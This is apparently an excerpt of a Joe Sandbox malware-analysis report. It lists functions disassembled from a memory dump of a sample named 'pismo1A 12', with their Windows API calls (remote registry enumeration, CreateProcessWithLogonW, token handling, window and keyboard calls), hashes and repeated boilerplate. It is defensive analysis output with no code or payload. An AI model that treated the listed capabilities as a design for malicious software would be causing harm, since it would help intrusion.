Part of subcall function 006D3820: RtlAllocateHeap.NTDLL(00000000,?,00771444,?,006BFDF5,?,?,006AA976,00000010,00771440,006A13FC,?,006A13C6,?,006A1129), ref: 006D3852

__freea.LIBCMT ref: 006D63EE
__freea.LIBCMT ref: 006D6413

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 1fe672017f0bda59fc074049c300804b3ab928fbc8a9a43dadb8d586c9973ed2
Instruction ID: 52ee46a50e8334df4862fd95ac41680d42a5a37cb441d13014d47e8fe0f600f4
Opcode Fuzzy Hash: 1fe672017f0bda59fc074049c300804b3ab928fbc8a9a43dadb8d586c9973ed2
Instruction Fuzzy Hash: 3051D072E00216ABEB268F64DC81EEF77ABEB44710F16462AFC05D6341EB34DD45D6A0

Function 0072BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD

Part of subcall function 0072C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0072B6AE,?,?), ref: 0072C9B5
Part of subcall function 0072C998: _wcslen.LIBCMT ref: 0072C9F1
Part of subcall function 0072C998: _wcslen.LIBCMT ref: 0072CA68
Part of subcall function 0072C998: _wcslen.LIBCMT ref: 0072CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0072BCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0072BD25
RegCloseKey.ADVAPI32(00000000), ref: 0072BD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0072BD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0072BDF3
RegCloseKey.ADVAPI32(?), ref: 0072BDFF

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: c004871718dd7444a5fcb08f4fa57d258de092b08aa240cd3abf05009e528468
Instruction ID: ed8eea9986c740c8ae9d95de936788bb45a6bc4a84a548048df9f209b004d93a
Opcode Fuzzy Hash: c004871718dd7444a5fcb08f4fa57d258de092b08aa240cd3abf05009e528468
Instruction Fuzzy Hash: AF81BE70208241EFD714EF24C885E6ABBE5FF85308F14895CF5598B2A2DB35ED45CB92

Function 006FF7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 006FF7B9
SysAllocString.OLEAUT32(00000001), ref: 006FF860
VariantCopy.OLEAUT32(006FFA64,00000000), ref: 006FF889
VariantClear.OLEAUT32(006FFA64), ref: 006FF8AD
VariantCopy.OLEAUT32(006FFA64,00000000), ref: 006FF8B1
VariantClear.OLEAUT32(?), ref: 006FF8BB

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 2b2c7be50fc61254365670e57ef8b5db7fa241b57dad4b4ff855e5826eed078f
Instruction ID: d7c64717ca9e711501c74fa2ddc60f75761eba35b8a0e113c3b581251bdc3910
Opcode Fuzzy Hash: 2b2c7be50fc61254365670e57ef8b5db7fa241b57dad4b4ff855e5826eed078f
Instruction Fuzzy Hash: 0951F831900318BADF50AB65D895B79B3E6EF45310F24946AEA05DF292DBB08C40DB5A

Function 0071910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 006A7620: _wcslen.LIBCMT ref: 006A7625

Part of subcall function 006A6B57: _wcslen.LIBCMT ref: 006A6B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 007194E5
_wcslen.LIBCMT ref: 00719506
_wcslen.LIBCMT ref: 0071952D
GetSaveFileNameW.COMDLG32(00000058), ref: 00719585

Strings

X, xrefs: 00719412

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 6fe3a538d1bcccc515da123c3cc6ddedd96c6a2e0d6c759a5690f66ca2c61824
Instruction ID: 2e02a88b6813bc8c88317358e3e81313078fec609979288877b9987abfe9c298
Opcode Fuzzy Hash: 6fe3a538d1bcccc515da123c3cc6ddedd96c6a2e0d6c759a5690f66ca2c61824
Instruction Fuzzy Hash: 44E1D3315083508FC754EF28C891AAAB7E2FF85310F04896DF9899B2A2DB34DD45CF96

Function 006B920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 006B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 006B9BB2

BeginPaint.USER32(?,?,?), ref: 006B9241
GetWindowRect.USER32(?,?), ref: 006B92A5
ScreenToClient.USER32(?,?), ref: 006B92C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 006B92D3
EndPaint.USER32(?,?,?,?,?), ref: 006B9321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 006F71EA

Part of subcall function 006B9339: BeginPath.GDI32(00000000), ref: 006B9357

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: c501c6ed83dd6a9fad047e68fecc3fdbccfbc98245513abb4e077f358239d57b
Instruction ID: 3c6e25b24d591463cdaf6206e5965cbe718b3010e48983869e98a454fd3ed942
Opcode Fuzzy Hash: c501c6ed83dd6a9fad047e68fecc3fdbccfbc98245513abb4e077f358239d57b
Instruction Fuzzy Hash: 7E41C1B1104200AFE721DF28CC85FFA7BEAEB45365F144229FB54872A1C735A886DB65

Function 007107EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0071080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00710847
EnterCriticalSection.KERNEL32(?), ref: 00710863
LeaveCriticalSection.KERNEL32(?), ref: 007108DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 007108F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00710921

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: e413cda0448f57dda8ce7ad7922b47aede514495d214ede5c862c1273d055552
Instruction ID: 0a8c6d9686b3b9422ae59fcbca002a3fefadf65a7765d12b45b9dc9547e0eca7
Opcode Fuzzy Hash: e413cda0448f57dda8ce7ad7922b47aede514495d214ede5c862c1273d055552
Instruction Fuzzy Hash: F6418F71900205EFEF159F64DC85AAA7779FF04310F1480A9ED00AA297DB74DEA1DBA8

Function 007381DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,006FF3AB,00000000,?,?,00000000,?,006F682C,00000004,00000000,00000000), ref: 0073824C
EnableWindow.USER32(00000000,00000000), ref: 00738272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 007382D1
ShowWindow.USER32(00000000,00000004), ref: 007382E5
EnableWindow.USER32(00000000,00000001), ref: 0073830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0073832F

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: b9fa229399d35af0fe82b54af20d07901401f384d477d1d683704f66a7255ec2
Instruction ID: 5b01173f9f9967c7808c4eb6c40fedb8ad9e81251fbe962e16c84ef4c7a8cbb0
Opcode Fuzzy Hash: b9fa229399d35af0fe82b54af20d07901401f384d477d1d683704f66a7255ec2
Instruction Fuzzy Hash: 89418334601744EFEB51CF15C899BA97BE0FB0A715F1881A9FA085B263CB39A841CF56

Function 00704C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00704C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00704CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00704CEA
_wcslen.LIBCMT ref: 00704D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00704D10
_wcsstr.LIBVCRUNTIME ref: 00704D1A

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: a3a01eb690020f4c07736cb57f4acb6ac0444c94e18661895b3dac6030c17f47
Instruction ID: 521dbc064bc53a50380c7fa3bd8637cbedfb95b810c1ed48a1c957ec6566653b
Opcode Fuzzy Hash: a3a01eb690020f4c07736cb57f4acb6ac0444c94e18661895b3dac6030c17f47
Instruction Fuzzy Hash: 4A2107B2204210FBFB155B35DC0AE7B7BDDDF45750F10816DFA05DA1A1DA69CC4187A0

Function 0071581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 006A3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006A3A97,?,?,006A2E7F,?,?,?,00000000), ref: 006A3AC2

_wcslen.LIBCMT ref: 0071587B
CoInitialize.OLE32(00000000), ref: 00715995
CoCreateInstance.OLE32(0073FCF8,00000000,00000001,0073FB68,?), ref: 007159AE
CoUninitialize.OLE32 ref: 007159CC

Strings

.lnk, xrefs: 00715876, 007158C1, 00715985

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: 26535e4bc337723fdce7019d0d019bde2805ac0855d54e204824d33cf731585a
Instruction ID: 137735d03595a2aa69c6ee58a0cc5311992da1911c35e416161e86b15c9d16c1
Opcode Fuzzy Hash: 26535e4bc337723fdce7019d0d019bde2805ac0855d54e204824d33cf731585a
Instruction Fuzzy Hash: 1DD147B1608601DFC718EF18C48096ABBE6EF89710F14895DF8859B3A1DB35ED85CF92

Function 0070175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00700FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00700FCA
Part of subcall function 00700FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00700FD6
Part of subcall function 00700FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00700FE5
Part of subcall function 00700FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00700FEC
Part of subcall function 00700FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00701002

GetLengthSid.ADVAPI32(?,00000000,00701335), ref: 007017AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 007017BA
HeapAlloc.KERNEL32(00000000), ref: 007017C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 007017DA
GetProcessHeap.KERNEL32(00000000,00000000,00701335), ref: 007017EE
HeapFree.KERNEL32(00000000), ref: 007017F5

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 1d63d78fc175b11c6b8fe4461b7278477d8ad7056a4aab54db4a0387bb6e1bef
Instruction ID: 971a0dec10232068bce6180b2b804788b6a84a1d694141d6bbf6459ad85e56b3
Opcode Fuzzy Hash: 1d63d78fc175b11c6b8fe4461b7278477d8ad7056a4aab54db4a0387bb6e1bef
Instruction Fuzzy Hash: 5E11BE72500205FFEB159FA4CC49BAE7BE9EB4535AF508218F481A7290D739AD40DB60

Function 007014CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 007014FF
OpenProcessToken.ADVAPI32(00000000), ref: 00701506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00701515
CloseHandle.KERNEL32(00000004), ref: 00701520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0070154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 00701563

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 1bfd1e36344714ef932e03df61b9009ed08486b3737941eef13351d597ee8360
Instruction ID: 5c4cf0d04c80bf050b1f4fbad473209d1438bcc75595b2c338f85120a3955bf1
Opcode Fuzzy Hash: 1bfd1e36344714ef932e03df61b9009ed08486b3737941eef13351d597ee8360
Instruction Fuzzy Hash: 3B112972500249EBEF128F98DD49BDE7BE9EF48749F048115FA05A60A0C3798E64DB61

Function 006C3382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,006C3379,006C2FE5), ref: 006C3390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 006C339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 006C33B7
SetLastError.KERNEL32(00000000,?,006C3379,006C2FE5), ref: 006C3409

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 799691173656e2c62b50a188fd1828d5832a5c76e2a5462b6a23c7ba8790e982
Instruction ID: cedeb6ead6cdb93bdd004c12a2bb310a1f48866f2bbf56e5ca7f27d100dcfe4d
Opcode Fuzzy Hash: 799691173656e2c62b50a188fd1828d5832a5c76e2a5462b6a23c7ba8790e982
Instruction Fuzzy Hash: 9901243260C3B1BEA62637757C95FB63A96EB15379320C22EF410853F0EF594D02528C

Function 006D2D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,006D5686,006E3CD6,?,00000000,?,006D5B6A,?,?,?,?,?,006CE6D1,?,00768A48), ref: 006D2D78
_free.LIBCMT ref: 006D2DAB
_free.LIBCMT ref: 006D2DD3
SetLastError.KERNEL32(00000000,?,?,?,?,006CE6D1,?,00768A48,00000010,006A4F4A,?,?,00000000,006E3CD6), ref: 006D2DE0
SetLastError.KERNEL32(00000000,?,?,?,?,006CE6D1,?,00768A48,00000010,006A4F4A,?,?,00000000,006E3CD6), ref: 006D2DEC
_abort.LIBCMT ref: 006D2DF2

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 139fb3676dbd1b92881bf7fa2473e58410af7f23e1f5ed1b002e22fb5c208c28
Instruction ID: 1086f68610c5bd92a682aae8568380d216bd3ba3e048641623151f6417a4a219
Opcode Fuzzy Hash: 139fb3676dbd1b92881bf7fa2473e58410af7f23e1f5ed1b002e22fb5c208c28
Instruction Fuzzy Hash: 22F0CD31D0470267D75327357C36E5B25576FE27A1F24441FF464D23D1EE6889015279

Function 00738A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 006B9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 006B9693
Part of subcall function 006B9639: SelectObject.GDI32(?,00000000), ref: 006B96A2
Part of subcall function 006B9639: BeginPath.GDI32(?), ref: 006B96B9
Part of subcall function 006B9639: SelectObject.GDI32(?,00000000), ref: 006B96E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00738A4E
LineTo.GDI32(?,00000003,00000000), ref: 00738A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00738A70
LineTo.GDI32(?,00000000,00000003), ref: 00738A80
EndPath.GDI32(?), ref: 00738A90
StrokePath.GDI32(?), ref: 00738AA0

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: fe290c9225c49ff4359e1db984cb138fbd965e2fc8777ea70c3699da98ab0992
Instruction ID: cb1176cde34a79fcd0a1068211ef3425a3a01acc985bbe6c91467b8d28d1f69f
Opcode Fuzzy Hash: fe290c9225c49ff4359e1db984cb138fbd965e2fc8777ea70c3699da98ab0992
Instruction Fuzzy Hash: 84111E7600014CFFEF129F94DC48E9A7F6DEB04355F00C011BA1999161D7759D55DFA4

Function 007051FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00705218
GetDeviceCaps.GDI32(00000000,00000058), ref: 00705229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00705230
ReleaseDC.USER32(00000000,00000000), ref: 00705238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0070524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00705261

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 7e9e3cd9a7ebcaefff9c000fb953752ee2ed42847b4c60538daacf82c6d183ca
Instruction ID: 616c60f966884322883999c29921d8d4b13b5842f52098750b88145db076ad65
Opcode Fuzzy Hash: 7e9e3cd9a7ebcaefff9c000fb953752ee2ed42847b4c60538daacf82c6d183ca
Instruction Fuzzy Hash: 67018FB6A00708FBEB119BA59C49A5EBFB8FF48352F048165FA04E7290D6749800CFA4

Function 006A1BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 006A1BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 006A1BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 006A1C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 006A1C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 006A1C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 006A1C22

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: b4cf20d3c230584b5bdb48f9b4b493fb2fb8bf97a0ad660fc21089dbb185c252
Instruction ID: 04de628feb0283686404b8a88eed28aa8b916247e850199edeb1131fcfbdc96b
Opcode Fuzzy Hash: b4cf20d3c230584b5bdb48f9b4b493fb2fb8bf97a0ad660fc21089dbb185c252
